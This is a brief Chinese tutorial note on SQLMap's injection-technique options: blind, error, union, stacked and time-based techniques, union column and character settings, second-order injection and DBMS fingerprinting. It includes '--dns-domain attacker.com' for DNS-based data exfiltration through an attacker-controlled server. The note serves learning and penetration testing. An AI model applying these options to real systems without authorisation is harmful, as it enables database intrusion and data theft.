二十四、SQLMap自动注入-(7)Techniques类、Fi

1、默认使用的技术

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries（文件系统、操作系统、注册表时必须使用此参数）
• T: Time-based blind

2、选项 --time-sec

• 基于时间的注入检测相应延迟时间（默认为5s）

3、选项 --union-cols

• 默认联合查询1-10列，随--level增加最多支持50列

--union-cols 6-9

4、选项 --union-char

• 联合查询默认使用NULL（如select 1,2，如果不想看第一个字段，使用select null,2），但有些情况下NULL可能失败，此时需要手动指定此值

--union-char 123  //用此时替换null

5、选项 --dns-domain

*使用此参数的前提是攻击者已经控制了某DNS服务器，使用此功能可以提高数据榨取的速度

--dns-domain attacker.com

6、选项 --second-order

• 在一个页面注入的结果，从另一个页面体现出来

--second-order http://1.1.1.1/b.php
//此处的1.1.1.1是注入成功后返回的第二个页面

7、选项-f，--fingerprint，-b，--banner

• 数据库管理系统指纹信息
• DBMS、操作系统、架构、补丁